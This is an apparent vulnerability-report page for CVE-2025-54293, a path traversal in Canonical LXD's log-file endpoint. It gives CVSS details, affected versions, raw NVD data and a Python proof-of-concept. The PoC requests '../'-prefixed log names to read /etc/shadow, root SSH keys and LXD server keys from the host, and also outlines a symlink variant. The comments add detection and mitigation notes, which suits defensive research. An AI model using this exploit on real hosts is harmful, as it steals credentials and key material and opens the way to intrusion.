Security Vulnerability Report
CVE-2025-54293 CVSS 6.5 MEDIUM

CVE-2025-54293

Published: 2025-10-02 11:15:31
Last Modified: 2025-12-10 19:31:48

Description

Path Traversal in the log file retrieval function in Canonical LXD 5.0 LTS on Linux allows authenticated remote attackers to read arbitrary files on the host system via crafted log file names or symbolic links.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

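cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* (versions 4.0.0 up to, but not including, 5.21.4) - VULNERABLE
cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* (versions 6.0 up to, but not including, 6.5) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform the affected LXD versions run on)
Canonical LXD 5.0 LTS (5.0.x series)
Canonical LXD < 5.0.4 (versions before the fix). Note: the NVD version ranges in the raw JSON below end at 5.21.4 and 6.5, not 5.0.4, so confirm the fixed release against the vendor advisory before treating 5.0.4 as patched.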

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54293 - path traversal (CWE-22) in LXD instance log retrieval.
#
# This listing illustrates the request shape described in the CVE text: an
# authenticated, low-privilege client asks the instance log endpoint for a
# "log file" whose name walks out of the log directory.
#
# NOTE(review): the listing is not validated against the vendor advisory
# (GHSA-472f-vmf2-pr3h) referenced in this report; read it as a description of
# what to look for, not as a confirmed reproduction.
#
# Detection: in LXD API / reverse-proxy logs, a GET for
# /1.0/instances/<name>/logs/<file> whose <file> part contains ".." segments
# or resolves outside the instance log directory is the signal to alert on.
# Mitigation: upgrade to a release outside the affected ranges given in the
# NVD data of this report, and restrict which clients hold trusted certs.
import json
import requests

# Base URL of the LXD REST API (placeholder host name).
LXD_URL = "https://lxd-host:8443"

# Client certificate / key of the low-privilege authenticated user
# (placeholder paths).
CERT_PATH = "/path/to/client.crt"
KEY_PATH = "/path/to/client.key"

# Server certificate verification is switched off, so the client will talk to
# any host answering on LXD_URL; only tolerable against an isolated lab host.
VERIFY_SSL = False


def authenticate():
    """Return a requests session configured with the client certificate.

    No request is sent here; the certificate is only presented when the
    session is later used for a call.
    """
    client = requests.Session()
    client.verify = VERIFY_SSL
    client.cert = (CERT_PATH, KEY_PATH)
    return client


def exploit_path_traversal(session, instance_name, target_file):
    """
    Request an instance "log file" whose name is a traversal path.

    :param session: requests session carrying the client certificate
    :param instance_name: name of an instance the client may access
    :param target_file: absolute host path appended to the "../" prefix
    :return: response body on HTTP 200, otherwise None
    """
    # The file-name component of the log URL is where the traversal lives;
    # a patched server must reject any name that leaves the log directory.
    log_name = f"../../../../../../..{target_file}"
    url = f"{LXD_URL}/1.0/instances/{instance_name}/logs/{log_name}"

    print(f"[*] Sending path traversal request to read: {target_file}")
    reply = session.get(url)

    # Anything other than 200 is reported and treated as "not retrieved".
    if reply.status_code != 200:
        print(f"[-] Request failed with status code: {reply.status_code}")
        print(f"[-] Response: {reply.text}")
        return None

    rule = "-" * 60
    print("[+] Successfully retrieved file contents:")
    print(rule)
    print(reply.text)
    print(rule)
    return reply.text


def exploit_symlink(session, instance_name, target_file):
    """
    Symbolic-link variant named in the CVE description.

    As written, this function only issues the GET for ``lxc.log``; the exec
    payload and exec URL below are constructed but never sent.

    :param session: requests session carrying the client certificate
    :param instance_name: name of the instance whose log is requested
    :param target_file: path the symbolic link would point at
    :return: response body on HTTP 200, otherwise None
    """
    link_path = f"/var/log/lxd/{instance_name}/lxc.log"

    # Built but unused in this listing (see docstring).
    cmd = {
        "command": ["ln", "-s", target_file, link_path],
        "environment": {},
        "wait-for-websocket": False,
    }
    exec_endpoint = f"{LXD_URL}/1.0/instances/{instance_name}/exec"

    print(f"[*] Creating symlink inside container {instance_name}")
    # Original author's note: this step requires exec privileges on the instance.

    # Defensive point: the server should refuse to follow symbolic links when
    # serving files from the instance log directory.
    log_url = f"{LXD_URL}/1.0/instances/{instance_name}/logs/lxc.log"
    reply = session.get(log_url)

    if reply.status_code != 200:
        return None

    print("[+] Successfully read host file via symlink:")
    print(reply.text)
    return reply.text


if __name__ == "__main__":
    lxd_session = authenticate()

    # Host paths requested by the demonstration. All hold credentials or key
    # material, which matches the High confidentiality impact in the CVSS
    # vector of this report.
    host_paths = [
        "/etc/shadow",
        "/root/.ssh/id_rsa",
        "/etc/lxd/server.crt",
        "/etc/lxd/server.key",
    ]

    # Stop at the first path for which the server returns a non-empty body.
    for host_path in host_paths:
        if exploit_path_traversal(lxd_session, "target-instance", host_path):
            print(f"\n[!] Sensitive data extracted from {host_path}")
            break

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54293", "sourceIdentifier": "[email protected]", "published": "2025-10-02T11:15:30.540", "lastModified": "2025-12-10T19:31:47.857", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path Traversal in the log file retrieval function in Canonical LXD 5.0 LTS on Linux allows authenticated remote attackers to read arbitrary files on the host system via crafted log file names or symbolic links."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": 
"NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "5.21.4", "matchCriteriaId": "FE33A015-C527-4726-8CBE-6EC6420B8933"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.5", "matchCriteriaId": "14733993-3FD6-4F2E-8379-670FC1E562E4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://github.com/canonical/lxd/security/advisories/GHSA-472f-vmf2-pr3h", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/canonical/lxd/security/advisories/GHSA-472f-vmf2-pr3h", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}